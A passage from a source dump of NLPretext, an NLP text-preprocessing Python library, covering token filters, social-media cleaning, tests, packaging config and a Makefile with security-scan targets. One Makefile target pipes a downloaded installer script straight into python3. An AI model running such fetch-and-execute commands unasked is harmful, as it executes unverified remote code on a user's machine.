83 |     -------
84 |     list
85 |         list of tokens without the tokens that contain only special characters
86 | 
87 |     """
88 |     tokens = [word for word in tokens if re.search("[a-zA-Z0-9]", word)]
89 |     return tokens
90 | 
91 | 
92 | def remove_smallwords(tokens: List[str], smallwords_threshold: int) -> List[str]:
93 |     """
94 |     Remove words whose length is below a threshold
95 |     ["hello", "my", "name", "is", "John", "Doe"] --> ["hello","name","John","Doe"].
96 | 
97 |     Parameters
98 |     ----------
99 |     tokens : list
100 |         list of tokens
101 |     smallwords_threshold: int
102 |         maximum length of the words to be removed
103 | 
104 |     Returns
105 |     -------
106 |     list
107 |         list of tokens longer than the threshold
108 |     """
109 |     tokens = [word for word in tokens if len(word) > smallwords_threshold]
110 |     return tokens
111 | 
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | # Contributor Covenant Code of Conduct
2 | 
3 | ## Our Pledge
4 | 
5 | In the interest of fostering an open and welcoming environment, we as
6 | contributors and maintainers pledge to making participation in our project and
7 | our community a harassment-free experience for everyone, regardless of age, body
8 | size, disability, ethnicity, sex characteristics, gender identity and expression,
9 | level of experience, education, socio-economic status, nationality, personal
10 | appearance, race, religion, or sexual identity and orientation.
11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at rafaelle.aygalenq@artefact.com. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 
67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html 72 | 73 | [homepage]: https://www.contributor-covenant.org 74 | 75 | For answers to common questions about this code of conduct, see 76 | https://www.contributor-covenant.org/faq 77 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | SHELL := /usr/bin/env bash 2 | 3 | IMAGE := nlpretext 4 | VERSION := latest 5 | 6 | NO_CHECK_FLAG = || true 7 | 8 | ifeq ($(STRICT), 1) 9 | POETRY_COMMAND_FLAG = 10 | PIP_COMMAND_FLAG = 11 | SAFETY_COMMAND_FLAG = 12 | BANDIT_COMMAND_FLAG = 13 | SECRETS_COMMAND_FLAG = 14 | BLACK_COMMAND_FLAG = 15 | DARGLINT_COMMAND_FLAG = 16 | ISORT_COMMAND_FLAG = 17 | MYPY_COMMAND_FLAG = 18 | else 19 | POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG) 20 | PIP_COMMAND_FLAG = $(NO_CHECK_FLAG) 21 | SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG) 22 | BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG) 23 | SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG) 24 | BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG) 25 | DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG) 26 | ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG) 27 | MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG) 28 | endif 29 | 30 | ifeq ($(POETRY_STRICT), 1) 31 | POETRY_COMMAND_FLAG = 32 | else ifeq ($(POETRY_STRICT), 0) 33 | POETRY_COMMAND_FLAG = $(NO_CHECK_FLAG) 34 | endif 35 | 36 | ifeq ($(PIP_STRICT), 1) 37 | PIP_COMMAND_FLAG = 38 | else ifeq ($(PIP_STRICT), 0) 39 | PIP_COMMAND_FLAG = $(NO_CHECK_FLAG) 40 | endif 41 | 42 | ifeq ($(SAFETY_STRICT), 1) 43 | SAFETY_COMMAND_FLAG = 44 | else ifeq ($(SAFETY_STRICT), 0) 45 | SAFETY_COMMAND_FLAG = $(NO_CHECK_FLAG) 46 | endif 47 | 48 | ifeq ($(BANDIT_STRICT), 1) 49 | BANDIT_COMMAND_FLAG = 50 | else ifeq ($(BANDIT_STRICT), 0) 51 | BANDIT_COMMAND_FLAG = $(NO_CHECK_FLAG) 52 | endif 53 | 54 | ifeq ($(SECRETS_STRICT), 1) 55 | SECRETS_COMMAND_FLAG = 56 | else ifeq ($(SECRETS_STRICT), 0) 57 | SECRETS_COMMAND_FLAG = $(NO_CHECK_FLAG) 58 | endif 59 | 60 | ifeq ($(BLACK_STRICT), 1) 61 | BLACK_COMMAND_FLAG = 62 | else ifeq ($(BLACK_STRICT), 0) 63 | BLACK_COMMAND_FLAG = $(NO_CHECK_FLAG) 64 | endif 65 | 66 | ifeq ($(DARGLINT_STRICT), 1) 67 | DARGLINT_COMMAND_FLAG = 68 | else ifeq ($(DARGLINT_STRICT), 0) 69 | DARGLINT_COMMAND_FLAG = $(NO_CHECK_FLAG) 70 | endif 71 | 72 | ifeq ($(ISORT_STRICT), 1) 73 | ISORT_COMMAND_FLAG = 74 | else ifeq ($(ISORT_STRICT), 0) 75 | ISORT_COMMAND_FLAG = $(NO_CHECK_FLAG) 76 | endif 77 | 78 | ifeq ($(MYPY_STRICT), 1) 79 | MYPY_COMMAND_FLAG = 80 | else ifeq ($(MYPY_STRICT), 0) 81 | MYPY_COMMAND_FLAG = $(NO_CHECK_FLAG) 82 | endif 83 | 84 | .PHONY: download-poetry 85 | download-poetry: 86 | curl -sSL https://install.python-poetry.org | python3 - 87 | 88 | .PHONY: install 89 | install: 90 | poetry env use python3.10 91 | poetry lock -n 92 | poetry install -n 93 | ifneq ($(NO_PRE_COMMIT), 1) 94 | poetry run pre-commit install -t pre-commit -t pre-push 95 | endif 96 | 97 | .PHONY: check-safety 98 | check-safety: 99 | poetry check$(POETRY_COMMAND_FLAG) && \ 100 | poetry run pip check$(PIP_COMMAND_FLAG) && \ 101 | poetry run safety check --full-report$(SAFETY_COMMAND_FLAG) && \ 102 | poetry run bandit -r nlpretext/$(BANDIT_COMMAND_FLAG) 103 | 104 | .PHONY: gitleaks 105 | gitleaks: 106 | commits="$$(git rev-list --ancestry-path $$(git rev-parse $$(git branch -r --sort=committerdate | tail -1))..$$(git rev-parse HEAD))"; \ 107 | 
if [ "$${commits}" != "" ]; then docker run --rm -v $$(pwd):/code/ zricethezav/gitleaks --path=/code/ -v --commits=$$(echo $${commits} | paste -s -d, -)$(SECRETS_COMMAND_FLAG); fi; 108 | 109 | .PHONY: format-code 110 | format-code: 111 | poetry run pre-commit run --all 112 | 113 | .PHONY: test 114 | test: 115 | poetry run pytest 116 | 117 | .PHONY: lint 118 | lint: check-safety format-code test 119 | 120 | # Example: make docker VERSION=latest 121 | # Example: make docker IMAGE=some_name VERSION=1.0.4 122 | .PHONY: docker 123 | docker: 124 | @echo Building docker $(IMAGE):$(VERSION) ... 125 | docker build \ 126 | -t $(IMAGE):$(VERSION) . \ 127 | -f ./docker/Dockerfile 128 | 129 | # Example: make clean_docker VERSION=latest 130 | # Example: make clean_docker IMAGE=some_name VERSION=1.0.4 131 | .PHONY: clean_docker 132 | clean_docker: 133 | @echo Removing docker $(IMAGE):$(VERSION) ... 134 | docker rmi -f $(IMAGE):$(VERSION) 135 | 136 | .PHONY: clean_build 137 | clean_build: 138 | rm -rf build/ 139 | 140 | .PHONY: clean 141 | clean: clean_build clean_docker 142 | -------------------------------------------------------------------------------- /pyproject.toml: -------------------------------------------------------------------------------- 1 | # Poetry pyproject.toml: https://python-poetry.org/docs/pyproject/ 2 | 3 | [build-system] 4 | requires = ["poetry_core>=1.0.0"] 5 | build-backend = "poetry.core.masonry.api" 6 | 7 | [tool.poetry] 8 | name = "nlpretext" 9 | version = "1.2.2" 10 | description = "All the goto functions you need to handle NLP use-cases, integrated in NLPretext" 11 | readme = "README.md" 12 | authors = [ 13 | "artefactory " 14 | ] 15 | license = "Apache Software License 2.0" 16 | repository = "https://github.com/artefactory/NLPretext" 17 | homepage = "https://github.com/artefactory/NLPretext" 18 | 19 | # Keywords description https://python-poetry.org/docs/pyproject/#keywords 20 | keywords = [] # Update me 21 | 22 | # Pypi classifiers: https://pypi.org/classifiers/ 23 | classifiers = [ # Update me 24 | "Development Status :: 3 - Alpha", 25 | "Intended Audience :: Developers", 26 | "Operating System :: OS Independent", 27 | "Topic :: Software Development :: Libraries :: Python Modules", 28 | ] 29 | 30 | [tool.poetry.scripts] 31 | # Entry points for the package https://python-poetry.org/docs/pyproject/#scripts 32 | "nlpretext" = "nlpretext.cli.__main__:app" 33 | 34 | [tool.poetry.dependencies] 35 | python = ">=3.8,<3.11" 36 | typer = {extras = ["all"], version = ">=0.3.2"} 37 | rich = ">=10.1" 38 | chardet = ">=3.0.4" 39 | emoji = ">=2.0.0" 40 | flashtext = ">=2.7" 41 | ftfy = ">=4.2.0" 42 | mosestokenizer = ">=1.1.0" 43 | nlpaug = ">=1.0.1" 44 | nltk = ">=3.4.2" 45 | numpy = "^1.22" 46 | phonenumbers = ">=8.10.12" 47 | regex = ">=2019.8.19" 48 | sacremoses = ">=0.0.13" 49 | scikit-learn = ">=0.23.2, <2" 50 | spacy = ">=3.0.5" 51 | pillow = ">=8.2.1" 52 | thinc = ">=8.0.4" 53 | stop-words = ">=2018.7.23" 54 | pandas = ">=1.3,<3.0" 55 | pyarrow = ">=4.0.0" 56 | fastparquet = ">=0.4.1" 57 | dask = {version = ">=2021.5.0", extras = ["complete"], optional = true} 58 | distributed = {version = ">=2021.5.0", extras = ["complete"], optional = true} 59 | tornado = ">=6.0.3" 60 | torch = {version = "^1.9.0", optional = true} 61 | 62 | [tool.poetry.group.dev.dependencies] 63 | isort = ">=5.8.0" 64 | pyupgrade = ">=2.12.0" 65 | black = ">=20.8b1" 66 | ruff = "^0.1.5" 67 | mypy = ">=0.812" 68 | bandit = ">=1.7.0" 69 | safety = ">=1.10.3" 70 | pytest = ">=6.2.1" 71 | pytest-cov = ">=2.10.1" 
72 | coverage = ">=5.3" 73 | pre-commit = ">=2.12.0" 74 | mypy-extensions = ">=0.4.3" 75 | types-emoji = ">=1.2.2" 76 | types-chardet = ">=0.1.3" 77 | types-click = ">=7.1.2" 78 | 79 | 80 | [tool.poetry.group.docs.dependencies] 81 | nbsphinx = ">=0.8.0" 82 | notebook = ">=6.1.5" 83 | Pygments = ">=2.8.0" 84 | recommonmark=">=0.7.1" 85 | Sphinx = ">=3.5.4" 86 | sphinx-gallery = ">=0.8.1" 87 | sphinxcontrib-applehelp = ">=1.0.2" 88 | sphinxcontrib-devhelp = ">=1.0.2" 89 | sphinxcontrib-htmlhelp = ">=1.0.3" 90 | sphinxcontrib-jsmath = ">=1.0.1" 91 | sphinxcontrib-qthelp = ">=1.0.3" 92 | sphinxcontrib-serializinghtml = ">=1.1.4" 93 | sphinx-autodoc-typehints = ">=1.11.1" 94 | sphinx_rtd_theme = ">=0.5.2" 95 | sphinx-multiversion-pre-post-build = ">=0.2.4" 96 | 97 | 98 | [tool.poetry.extras] 99 | torch = ["torch"] 100 | dask = ["dask", "distributed"] 101 | 102 | [tool.black] 103 | # https://github.com/psf/black 104 | line-length = 100 105 | target-version = ["py38"] 106 | 107 | [tool.isort] 108 | # https://github.com/timothycrosley/isort/ 109 | profile = "black" 110 | known_typing = "typing,types,typing_extensions,mypy,mypy_extensions" 111 | sections = "FUTURE,TYPING,STDLIB,THIRDPARTY,FIRSTPARTY,LOCALFOLDER" 112 | default_section = "FIRSTPARTY" 113 | force_grid_wrap = 0 114 | line_length = 100 115 | 116 | 117 | [tool.ruff] 118 | ignore = [ 119 | "D100", 120 | "D101", 121 | "D106", 122 | "D205", 123 | "D400", 124 | "D415", 125 | "D401", 126 | ] 127 | line-length = 100 128 | select = ["B", "C", "D", "E", "F", "W"] 129 | 130 | [tool.ruff.pydocstyle] 131 | convention = "numpy" 132 | 133 | [tool.ruff.per-file-ignores] 134 | "*cli.py" = ["D", "B008"] 135 | "*__init__.py" = [ 136 | "F401", 137 | "D100", 138 | "D101", 139 | "D103", 140 | "D104", 141 | "D105", 142 | "D106", 143 | "D107", 144 | ] 145 | "tests/*" = ["D", "E501"] 146 | -------------------------------------------------------------------------------- /tests/test_file_loader.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | import os 17 | import re 18 | 19 | import numpy as np 20 | import pytest 21 | from nlpretext._utils.file_loader import check_text_file_format, detect_encoding 22 | 23 | TESTDOC_LATIN1 = "J'aime les frites bien grasse étalon châpeau!" 24 | TESTDOC_UTF8 = "Un deuxième exemple de texte en utf-8 cette fois!" 
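# Illustrative sketch (not part of the original suite): detect_encoding also
# accepts raw bytes directly, so no file fixture is strictly needed, eg.:
#
#     result = detect_encoding(TESTDOC_LATIN1.encode("latin-1"))
#     assert "encoding" in result  # chardet reports encoding, confidence and language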
25 | 26 | 27 | def create_files(): 28 | encoded_s = TESTDOC_LATIN1.encode("latin-1") 29 | with open("testdoc_latin1.txt", "wb") as f: 30 | f.write(encoded_s) 31 | 32 | encoded_s = TESTDOC_UTF8.encode("utf-8") 33 | with open("testdoc_utf8.txt", "wb") as f: 34 | f.write(encoded_s) 35 | return True 36 | 37 | 38 | def test_detect_encoding(): 39 | create_files() 40 | expected = {"encoding": "ISO-8859-1", "confidence": 0.73, "language": ""} 41 | result = detect_encoding("testdoc_latin1.txt") 42 | np.testing.assert_equal(result, expected) 43 | remove_files() 44 | 45 | 46 | def remove_files(): 47 | os.remove("testdoc_latin1.txt") 48 | os.remove("testdoc_utf8.txt") 49 | 50 | 51 | @pytest.mark.parametrize( 52 | "input_filepath, raising, expected_str", 53 | [ 54 | ("hello.csv", False, "csv"), 55 | ("folder/hello.csv", False, "csv"), 56 | ("gs://folder/hello.csv", False, "csv"), 57 | ("s3://folder/hello.csv", False, "csv"), 58 | ("hdfs://folder/hello.csv", False, "csv"), 59 | ("az://folder/hello.csv", False, "csv"), 60 | ("wildcards/*.csv", False, "csv"), 61 | ("compressed/gz/text.csv.gz", False, "csv"), 62 | ("compressed/zip/text.csv.zip", False, "csv"), 63 | (["hello.csv"], False, "csv"), 64 | (["hello.csv", "compressed.csv.gz"], False, "csv"), 65 | (["hello.csv", "other/folder/hello.csv"], False, "csv"), 66 | ("hello.json", False, "json"), 67 | ("folder/hello.json", False, "json"), 68 | ("gs://folder/hello.json", False, "json"), 69 | (["hello.json", "folder/hello.json"], False, "json"), 70 | ("hello.txt", False, "txt"), 71 | ("folder/hello.txt", False, "txt"), 72 | ("gs://folder/hello.txt", False, "txt"), 73 | (["hello.txt", "gs://folder/hello.txt"], False, "txt"), 74 | ("hello.parquet", False, "parquet"), 75 | ("folder/hello.parquet", False, "parquet"), 76 | ("gs://folder/hello.parquet", False, "parquet"), 77 | (["hello.parquet", "gs://folder/hello.parquet"], False, "parquet"), 78 | ( 79 | "gs://folder/hello.notaformat", 80 | True, 81 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted", 82 | ), 83 | ( 84 | "gs://folder/hello.gz", 85 | True, 86 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted", 87 | ), 88 | ( 89 | "gs://folder/hello.zip", 90 | True, 91 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted", 92 | ), 93 | ( 94 | "folder/*", 95 | True, 96 | "Unrecognized format among specified files, only .csv, .json, .parquet and .txt accepted", 97 | ), 98 | ( 99 | ["hello.txt", "gs://folder/hello.csv"], 100 | True, 101 | re.escape("Multiple file formats found in file path list: ['txt', 'csv']"), 102 | ), 103 | ], 104 | ) 105 | def test_check_text_file_format(input_filepath, raising, expected_str): 106 | if raising: 107 | with pytest.raises(ValueError, match=expected_str): 108 | check_text_file_format(input_filepath) 109 | else: 110 | result = check_text_file_format(input_filepath) 111 | assert result == expected_str 112 | -------------------------------------------------------------------------------- /nlpretext/social/preprocess.py: -------------------------------------------------------------------------------- 1 | # Copyright (C) 2020 Artefact 2 | # licence-information@artefact.com 3 | # 4 | # Licensed under the Apache License, Version 2.0 (the "License"); 5 | # you may not use this file except in compliance with the License. 
6 | # You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License 15 | 16 | 17 | from typing import List, Tuple 18 | 19 | import emoji as _emoji 20 | from nlpretext._config import constants 21 | from nlpretext.basic.preprocess import normalize_whitespace 22 | 23 | 24 | def remove_mentions(text: str) -> str: 25 | """ 26 | Function that removes words preceded with a '@'. 27 | 28 | Parameters 29 | ---------- 30 | text : str 31 | 32 | Returns 33 | ------- 34 | string 35 | """ 36 | text = normalize_whitespace(constants.AT_PATTERN.sub("", text)) 37 | return text 38 | 39 | 40 | def extract_mentions(text: str) -> List[str]: 41 | """ 42 | Function that extracts words preceded with a '@' 43 | eg. "I take care of my skin with @thisproduct" --> ["@thisproduct"]. 44 | 45 | Parameters 46 | ---------- 47 | text : str 48 | 49 | Returns 50 | ------- 51 | string 52 | """ 53 | return constants.AT_PATTERN.findall(text) 54 | 55 | 56 | def remove_html_tags(text: str) -> str: 57 | """ 58 | Function that removes words between < and >. 59 | 60 | Parameters 61 | ---------- 62 | text : str 63 | 64 | Returns 65 | ------- 66 | string 67 | """ 68 | text = normalize_whitespace(constants.HTML_TAG_PATTERN.sub("", text)) 69 | return text 70 | 71 | 72 | def remove_emoji(text: str) -> str: 73 | """ 74 | Remove emoji from any str by stripping any unicode in the range of Emoji unicode 75 | as defined in the unicode convention: 76 | http://www.unicode.org/emoji/charts/full-emoji-list.html. 77 | 78 | Parameters 79 | ---------- 80 | text : str 81 | 82 | Returns 83 | ------- 84 | str 85 | """ 86 | text = _emoji.replace_emoji(text, "") 87 | return text 88 | 89 | 90 | # TODO: replace mutable default value : 91 | # https://docs.quantifiedcode.com/python-anti-patterns/correctness/mutable_default_value_as_argument.html 92 | def convert_emoji_to_text(text: str, code_delimiters: Tuple[str, str] = (":", ":")) -> str: 93 | """ 94 | Convert emoji to their CLDR Short Name, according to the unicode convention 95 | http://www.unicode.org/emoji/charts/full-emoji-list.html 96 | eg. 😀 --> :grinning_face: 97 | 98 | Parameters 99 | ---------- 100 | text : str 101 | code_delimiters : tuple of symbols around the emoji code. 102 | eg: (':',':') --> :grinning_face: 103 | 104 | Returns 105 | ------- 106 | str 107 | string 108 | """ 109 | return _emoji.demojize(text, delimiters=code_delimiters) 110 | 111 | 112 | def extract_emojis(text: str) -> List[str]: 113 | """ 114 | Function that extracts emojis from a text and translates them into words 115 | eg. "I take care of my skin 😀 :(" --> [":grinning_face:"]. 116 | 117 | Parameters 118 | ---------- 119 | text : str 120 | 121 | Returns 122 | ------- 123 | list 124 | list of all emojis converted with their unicode conventions 125 | """ 126 | emojis_in_text = _emoji.emoji_list(text) 127 | emojis_converted = [ 128 | convert_emoji_to_text(emoji_text.get("emoji", "")) for emoji_text in emojis_in_text 129 | ] 130 | return emojis_converted 131 | 132 | 133 | def extract_hashtags(text: str) -> List[str]: 134 | """ 135 | Function that extracts words preceded with a '#' 136 | eg. 
"I take care of my skin #selfcare#selfestim" --> ["skincare", "selfestim"]. 137 | 138 | Parameters 139 | ---------- 140 | text : str 141 | 142 | Returns 143 | ------- 144 | list 145 | list of all hashtags 146 | """ 147 | return constants.HASHTAG_PATTERN.findall(text) 148 | 149 | 150 | def remove_hashtag(text: str) -> str: 151 | """ 152 | Function that removes words preceded with a '#' 153 | eg. "I take care of my skin #selfcare#selfestim" --> "I take care of my skin". 154 | 155 | Parameters 156 | ---------- 157 | text : str 158 | 159 | Returns 160 | ------- 161 | str 162 | text of a post without hashtags 163 | """ 164 | text = normalize_whitespace(constants.HASHTAG_PATTERN.sub("", text)) 165 | return text 166 | -------------------------------------------------------------------------------- /docs/make.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | REM Command file for Sphinx documentation 4 | 5 | if "%SPHINXBUILD%" == "" ( 6 | set SPHINXBUILD=sphinx-build 7 | ) 8 | set BUILDDIR=build 9 | set ALLSPHINXOPTS=-d %BUILDDIR%/doctrees %SPHINXOPTS% . 10 | if NOT "%PAPER%" == "" ( 11 | set ALLSPHINXOPTS=-D latex_paper_size=%PAPER% %ALLSPHINXOPTS% 12 | ) 13 | 14 | if "%1" == "" goto help 15 | 16 | if "%1" == "help" ( 17 | :help 18 | echo.Please use `make ^` where ^ is one of 19 | echo. html to make standalone HTML files 20 | echo. dirhtml to make HTML files named index.html in directories 21 | echo. singlehtml to make a single large HTML file 22 | echo. pickle to make pickle files 23 | echo. json to make JSON files 24 | echo. htmlhelp to make HTML files and a HTML help project 25 | echo. qthelp to make HTML files and a qthelp project 26 | echo. devhelp to make HTML files and a Devhelp project 27 | echo. epub to make an epub 28 | echo. latex to make LaTeX files, you can set PAPER=a4 or PAPER=letter 29 | echo. text to make text files 30 | echo. man to make manual pages 31 | echo. changes to make an overview over all changed/added/deprecated items 32 | echo. linkcheck to check all external links for integrity 33 | echo. doctest to run all doctests embedded in the documentation if enabled 34 | goto end 35 | ) 36 | 37 | if "%1" == "clean" ( 38 | for /d %%i in (%BUILDDIR%\*) do rmdir /q /s %%i 39 | del /q /s %BUILDDIR%\* 40 | goto end 41 | ) 42 | 43 | if "%1" == "html" ( 44 | %SPHINXBUILD% -b html %ALLSPHINXOPTS% %BUILDDIR%/html 45 | echo. 46 | echo.Build finished. The HTML pages are in %BUILDDIR%/html. 47 | goto end 48 | ) 49 | 50 | if "%1" == "dirhtml" ( 51 | %SPHINXBUILD% -b dirhtml %ALLSPHINXOPTS% %BUILDDIR%/dirhtml 52 | echo. 53 | echo.Build finished. The HTML pages are in %BUILDDIR%/dirhtml. 54 | goto end 55 | ) 56 | 57 | if "%1" == "singlehtml" ( 58 | %SPHINXBUILD% -b singlehtml %ALLSPHINXOPTS% %BUILDDIR%/singlehtml 59 | echo. 60 | echo.Build finished. The HTML pages are in %BUILDDIR%/singlehtml. 61 | goto end 62 | ) 63 | 64 | if "%1" == "pickle" ( 65 | %SPHINXBUILD% -b pickle %ALLSPHINXOPTS% %BUILDDIR%/pickle 66 | echo. 67 | echo.Build finished; now you can process the pickle files. 68 | goto end 69 | ) 70 | 71 | if "%1" == "json" ( 72 | %SPHINXBUILD% -b json %ALLSPHINXOPTS% %BUILDDIR%/json 73 | echo. 74 | echo.Build finished; now you can process the JSON files. 75 | goto end 76 | ) 77 | 78 | if "%1" == "htmlhelp" ( 79 | %SPHINXBUILD% -b htmlhelp %ALLSPHINXOPTS% %BUILDDIR%/htmlhelp 80 | echo. 81 | echo.Build finished; now you can run HTML Help Workshop with the ^ 82 | .hhp project file in %BUILDDIR%/htmlhelp. 
83 | goto end 84 | ) 85 | 86 | if "%1" == "qthelp" ( 87 | %SPHINXBUILD% -b qthelp %ALLSPHINXOPTS% %BUILDDIR%/qthelp 88 | echo. 89 | echo.Build finished; now you can run "qcollectiongenerator" with the ^ 90 | .qhcp project file in %BUILDDIR%/qthelp, like this: 91 | echo.^> qcollectiongenerator %BUILDDIR%\qthelp\Mapnik.qhcp 92 | echo.To view the help file: 93 | echo.^> assistant -collectionFile %BUILDDIR%\qthelp\Mapnik.ghc 94 | goto end 95 | ) 96 | 97 | if "%1" == "devhelp" ( 98 | %SPHINXBUILD% -b devhelp %ALLSPHINXOPTS% %BUILDDIR%/devhelp 99 | echo. 100 | echo.Build finished. 101 | goto end 102 | ) 103 | 104 | if "%1" == "epub" ( 105 | %SPHINXBUILD% -b epub %ALLSPHINXOPTS% %BUILDDIR%/epub 106 | echo. 107 | echo.Build finished. The epub file is in %BUILDDIR%/epub. 108 | goto end 109 | ) 110 | 111 | if "%1" == "latex" ( 112 | %SPHINXBUILD% -b latex %ALLSPHINXOPTS% %BUILDDIR%/latex 113 | echo. 114 | echo.Build finished; the LaTeX files are in %BUILDDIR%/latex. 115 | goto end 116 | ) 117 | 118 | if "%1" == "text" ( 119 | %SPHINXBUILD% -b text %ALLSPHINXOPTS% %BUILDDIR%/text 120 | echo. 121 | echo.Build finished. The text files are in %BUILDDIR%/text. 122 | goto end 123 | ) 124 | 125 | if "%1" == "man" ( 126 | %SPHINXBUILD% -b man %ALLSPHINXOPTS% %BUILDDIR%/man 127 | echo. 128 | echo.Build finished. The manual pages are in %BUILDDIR%/man. 129 | goto end 130 | ) 131 | 132 | if "%1" == "changes" ( 133 | %SPHINXBUILD% -b changes %ALLSPHINXOPTS% %BUILDDIR%/changes 134 | echo. 135 | echo.The overview file is in %BUILDDIR%/changes. 136 | goto end 137 | ) 138 | 139 | if "%1" == "linkcheck" ( 140 | %SPHINXBUILD% -b linkcheck %ALLSPHINXOPTS% %BUILDDIR%/linkcheck 141 | echo. 142 | echo.Link check complete; look for any errors in the above output ^ 143 | or in %BUILDDIR%/linkcheck/output.txt. 144 | goto end 145 | ) 146 | 147 | if "%1" == "doctest" ( 148 | %SPHINXBUILD% -b doctest %ALLSPHINXOPTS% %BUILDDIR%/doctest 149 | echo. 150 | echo.Testing of doctests in the sources finished, look at the ^ 151 | results in %BUILDDIR%/doctest/output.txt. 152 | goto end 153 | ) 154 | 155 | :end 156 | -------------------------------------------------------------------------------- /nlpretext/_utils/phone_number.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | from typing import List, Optional 19 | 20 | import phonenumbers as _phonenumbers 21 | from nlpretext._config.config import FORMAT_NUMBERS, SUPPORTED_COUNTRY 22 | 23 | 24 | def find_phone_numbers(string: str, region_code: Optional[str] = None) -> List[str]: 25 | """ 26 | Python port of Google's libphonenumber. 
27 |     https://github.com/daviddrysdale/python-phonenumbers.
28 | 
29 |     Parameters
30 |     ----------
31 |     region_code : str, optional
32 |         If specified, will find the number of the specified country.
33 |         eg. 06.00.00.00.00 if "FR" is specified.
34 | 
35 |         If not specified, only works for international-formatted phone numbers.
36 |         - ie. phone number with +country code specified
37 |         eg. 06.00.00.00.00 will return an error but +33 6 00 00 00 00 will work.
38 |         supported value: look SUPPORTED_COUNTRY variable.
39 | 
40 |     Returns
41 |     -------
42 |     list
43 |         list of matched phone numbers.
44 | 
45 |     Raises
46 |     ------
47 |     ValueError
48 |         if country code is not supported.
49 |     """
50 |     if region_code not in SUPPORTED_COUNTRY:
51 |         raise ValueError("Please enter a valid country code. See SUPPORTED_COUNTRY list.")
52 |     return [match.raw_string for match in _phonenumbers.PhoneNumberMatcher(string, region_code)]
53 | 
54 | 
55 | def extract_phone_numbers(text: str, countrylist: List[Optional[str]]) -> List[str]:
56 |     """
57 |     Find phone numbers in a text and return them as a list.
58 | 
59 |     Parameters
60 |     ----------
61 |     text : str
62 |     countrylist : list (eg. [None,'FR','US','GB'])
63 |         Look for phone numbers formatted according to the specified countrylist.
64 |         supported value: look SUPPORTED_COUNTRY variable.
65 | 
66 |     Returns
67 |     -------
68 |     list
69 |         List of unique phone numbers found.
70 |     """
71 |     all_phone_numbers: List[str] = []
72 |     for country in countrylist:
73 |         new_numbers_founds = find_phone_numbers(text, region_code=country)
